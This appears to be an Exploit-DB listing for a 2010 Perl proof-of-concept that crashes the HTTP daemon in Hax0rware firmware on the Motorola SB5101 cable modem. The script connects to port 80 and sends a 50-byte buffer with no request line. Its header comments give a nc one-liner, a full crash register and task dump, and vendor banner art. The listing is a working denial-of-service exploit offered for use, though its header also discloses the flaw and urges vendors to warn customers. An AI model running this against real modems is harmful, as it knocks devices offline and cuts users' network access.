Motorola SB5101 Hax0rware Rajko HTTPd – Remote Denial of Service (PoC)

  • 作者: Dillon Beresford
    日期: 2010-06-08
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/13774/
  • #!/usr/bin/perl
    
    # Motorola SB5101 Hax0rware Rajko HttpD Remote Exploit PoC
    # Author: Dillon Beresford
    # Date: 6/6/2010
    # Vendor: SBHacker & Motorola
    # Software Link: http://www.sbhacker.net/forum/index.php 
    # Tested on Hax0rware 1.1 R30, R32 and R39
    
    # Description: Motorola SB5101 Hax0rware Rajko HttpD Remote Exploit
    # If an unauthenticated user or attacker sends more than one byte to port 80
    # without a proper request line (such as "GET /somepath/file.cgi"), the HTTP
    # daemon crashes in the Rajko HttpD thread (handle 0x8054b9ac).
    
    # The developer of Hax0rware said he has bound the web server to the modem's local IP
    # to prevent attackers from triggering the vuln... This seems to be a quick fix at the moment.
    # I'm sure he will eventually fix the bug and update the firmware.
    
    # Motorola and cable providers should warn their customers (there are a number of
    # legitimate customers using this firmware for testing). It's important that you let
    # customers know about the risk of third-party firmware that isn't open source.
    
    # nc 192.168.100.1 80 <sendsomeevil>
    
    # For debugging telnet into the device 192.168.100.1 and run the poc.
    
    # >>> YIKES... looks like you may have a problem! <<< 
    
    # r0/zero=00000000 r1/at=fffffffe r2/v0=805a1800 r3/v1=00000000
    # r4/a0=8054aa58 r5/a1=00000000 r6/a2=00000000 r7/a3=00000000
    # r8/t0=00000000 r9/t1=807bcae4 r10/t2 =00000041 r11/t3 =000043e0
    # r12/t4 =4d154e68 r13/t5 =00000000 r14/t6 =00000000 r15/t7 =00000005
    # r16/s0 =8054bacc r17/s1 =00000000 r18/s2 =805a1800 r19/s3 =00000000
    # r20/s4 =00000001 r21/s5 =0000002a r22/s6 =8054b848 r23/s7 =00000001
    # r24/t8 =00000000 r25/t9 =00000059 r26/k0 =00000000 r27/k1 =11110017
    # r28/gp =80458fa0 r29/sp =8054b830 r30/fp =8054b960 r31/ra =8054a514
    
    # PC : 0x8054a534error addr: 0x00000000
    # cause: 0x00000008status: 0x1000ff03
    
    # BCM interrupt enable: ffffbff7, status: 00000000
    # Bad PC or SP.Can't trace the stack.
    
    # Task: Rajko HttpD
    # ---------------------------------------------------
    # ID: 0x0006
    # Handle: 0x8054b9ac
    # Set Priority: 23
    # Current Priority: 23
    # State:SUSP
    # Stack Base: 0x8054acd4
    # Stack Size: 3280 bytes
    # Stack Used: 1940 bytes
    # Stack StackStack
    #TaskId TaskNamePriority StateSizeUsed Margin
    # ---------- ------------------------------------------------------------------------
    # 0x8048f818 Idle Thread31 RUN 2048 6161432
    # 0x805131d0 Network alarm support 6 SLEEP 225612321024
    # 0x804924c8 Network support 7 SLEEP 819217046488
    # 0x80513f20pthread.0000080015EXIT 785211046748
    # 0x8048a1c8tStartup18 SLEEP1228852087080
    # 0x8054b9ac Rajko HttpD23SUSP 328019401340
    # 0x807f579cNonVol Device Async Helper25 SLEEP 3072 5042568
    # 0x807ebc7cMotorola Standby Switch Thread23 SLEEP 4096 4403656
    # 0x807ea984Motorola Vendor Ctl Thread23 SLEEP 4096 5123584
    # 0x807f64e8WDOG17 RUN 512027842336
    # 0x807e86b4 BFC Ping Thread29 SLEEP 6144 4765668
    # 0x807e4b3c ConsoleThread27 SLEEP368642172 34692
    # 0x807d687c TelnetD23 RUN 22561980 276
    # 0x807c666cCfgVB Thread23 SLEEP 4096 5043592
    # 0x807c501cDHCM25 SLEEP16384 512 15872
    # 0x807befacEvent Log Thread25 SLEEP 819221846008
    # 0x8079a51cTime Of Day Thread23 SLEEP 6144 4565688
    # 0x8079a98cCmDocsisIpThread23 SLEEP 8192 5047688
    # 0x80793af8 CmBpiManagerThd25 SLEEP 8192 5087684
    # 0x8078ff78 CmDsxHelper23 SLEEP 8192 5047688
    # 0x807abf50 CmDocsisCtlThread21 SLEEP 8192 6087584
    # 0x80788e44Scan Downstream Thread23 SLEEP 409614282668
    # 0x80785c20RateShaping Thread23 SLEEP 4096 4443652
    # 0x807f65e0CMHL23 SLEEP 4500 3684132
    # 0x807f66d8CMHH21 SLEEP 4500 3524148
    # 0x807f67d0ENRX23 RUN 450010283472
    # 0x807f68c8ENTX23 SLEEP 4500 7843716
    # 0x807f69c0ELNK23 SLEEP 4500 3204180
    # 0x807f6ab8USTX23 SLEEP 4500 3404160
    # 0x807f6bb0USRX23 SLEEP 4500 3724128
    # 0x807f6ca8UBCT19 SLEEP 4500 3564144
    # 0x807f6da0USRN23 SLEEP 4500 3404160
    # 0x806a5a34DHCP Client Thread23 SLEEP12288 508 11780
    # 0x807f6e98IpHalIst23 RUN 4500 8443656
    # 0x8069fb98CmPropaneCtlThread23 SLEEP 819216286564
    # 0x8069cf3c IGMP Thread23 SLEEP 4096 4563640
    # 0x8069b640 NetToMedia Thread23 SLEEP 4096 7963300
    # 0x806975a8 Trap Thread23 SLEEP16384 516 15868
    # 0x807f6030 SNMP Thread23 SLEEP204801176 19304
    # 0x805a7f0cDHCP Server Thread23 SLEEP 819214486744
    # 0x8047b410tNonVolTimer30 SLEEP 204810281020
    # Done!
    
    
    # * *
    #*** ***
    #*** ***
    #*** ***
    # ***** *****
    # ***** *****
    # ***** *****
    #******* *******
    #******* *******
    #******* *******
    # ********* *********
    # ********* *********
    # ******* *******
    #*********
    #*** * ***
    #** **
    # ** **
    # ** **
    #** **
    #* *
    #MotorolaCorporation
    
    # +----------------------------------------------------------------------------+
    # | _/_/ _/_/_/_/_/_/|
    # |_/_/ _/_/_/ Broadband |
    # | _/_/ _/_/|
    # |_/_/ _/_/_/_/ Foundation|
    # | _/_/ _/_/|
    # |_/ _/_/_/_/ Classes |
    # | _/_/_/ _/_/_/|
    # ||
    # | Copyright (c) 1999 - 2007 Broadcom Corporation |
    # ||
    # | Revision:3.9.33.3 RELEASE|
    # ||
    # | Features:Console Nonvol Fat HeapManager SNMP Networking USB1.1 |
    # +----------------------------------------------------------------------------+
    # | Standard Embedded Target Support for BFC |
    # ||
    # | Copyright (c) 2003 - 2007 Broadcom Corporation |
    # ||
    # | Revision:3.0.1 RELEASE |
    # ||
    # | Features:PID=0xc011 Bootloader-Rev=2.1.6d|
    # | Copyright (c) 2003 - 2007 Broadcom Corporation |
    # ||
    # | Revision:3.0.1 RELEASE |
    # ||
    # | Features:PID=0xc011 Bootloader-Rev=2.1.6d|
    # | Features:Bootloader-Compression-Support=0x19 |
    # +----------------------------------------------------------------------------+
    # | eCos BFC Application Layer |
    # ||
    # | Copyright (c) 1999 - 2007 Broadcom Corporation |
    # ||
    # | Revision:3.0.2 RELEASE |
    # ||
    # | Features:eCos Console Cmds, (no Idle Loop Profiler)|
    # +----------------------------------------------------------------------------+
    # | _/_/_/ _/|
    # |_/_/_/_/ _/_/ DOCSIS Cable Modem|
    # | _/_/_/ _/|
    # |_/_/ _/ |
    # | _/_/ _/|
    # |_/_/_/ _/ |
    # | _/_/_/ _/|
    # ||
    # | Copyright (c) 1999 - 2005 Broadcom Corporation |
    # ||
    # | Revision:3.9.33.3 RELEASE|
    # ||
    # | Features:AckCel(tm) DOCSIS 1.0/1.1/2.0 Propane(tm) CM SNMP w/Factory MIB |
    # | Features:Support CM Vendor Extension |
    # +----------------------------------------------------------------------------+
    # | Motorola Data-Only CM Vendor Extension |
    # ||
    # | Revision:3.0.0a RELEASE|
    # ||
    # | Features:DHCP ServerHTTP Server|
    # +----------------------------------------------------------------------------+
    # | Build Date:Apr 29 2009 |
    # | Build Time:15:08:51|
    # | Built By:vobadm02|
    # +----------------------------------------------------------------------------+
    
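    use strict;
    use warnings;
    use Socket;

    # PoC driver for the crash described in the header comment: connect to the
    # modem's HTTP daemon, write a buffer that carries no HTTP request line,
    # close the connection and give the device time to react.
    #
    # Usage: perl <this script> [cablemodem_ip] [port]
    #   cablemodem_ip  defaults to the modem's LAN-side address 192.168.100.1
    #   port           defaults to 80
    my $buff         = "\x41" x 50;                 # 50 bytes of 'A', no request line
    my $cablemodemip = shift || '192.168.100.1';
    my $port         = shift || 80;

    my $proto = getprotobyname('tcp')
        or die "getprotobyname(tcp) failed";

    # inet_aton returns undef for an unresolvable host; report that clearly
    # instead of letting sockaddr_in die with a cryptic "bad arg length".
    my $iaddr = inet_aton($cablemodemip)
        or die "cannot resolve host '$cablemodemip'";
    my $paddr = sockaddr_in($port, $iaddr);

    print "+---------------------------------------------------------------+\n".
    "| Motorola SB5101 Hax0rware Rajko HttpD Remote Exploit PoC|\n".
    "| Motorola: SB5101-2.7.6.0-GA-00-NOSH |\n".
    "| Version: 1.1 R30, R32 and R39 |\n".
    "| Vendor: Motorola Corporation and SBHacker |\n".
    "| Author: Dillon Beresford|\n".
    "| Date: 6/6/2010|\n".
    "+---------------------------------------------------------------+\n";

    # Lexical filehandle rather than the bareword SOCKET: no package-global
    # handle to collide with, and it is released when it goes out of scope.
    socket(my $sock, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
    print "[+] Connecting to cable modem httpd at $cablemodemip on port $port\n";
    connect($sock, $paddr) or die "connect: $!";

    print "[+] Sending our evil buffer...\n";
    print {$sock} $buff . "\n" or die "send: $!";
    print "[+] Payload sent\n";
    print "[+] This takes some time please wait.\n";
    print "[+] Dont look at me look at the leds on your modem\n";
    # Buffered write errors only surface at close, so this check is meaningful.
    close $sock or die "close: $!";
    # Pause while the device reacts; the duration is the author's choice and
    # is not derived from anything observable in this script.
    sleep(25);
    print "[+] Bye Bye Motorola SB5101 \n";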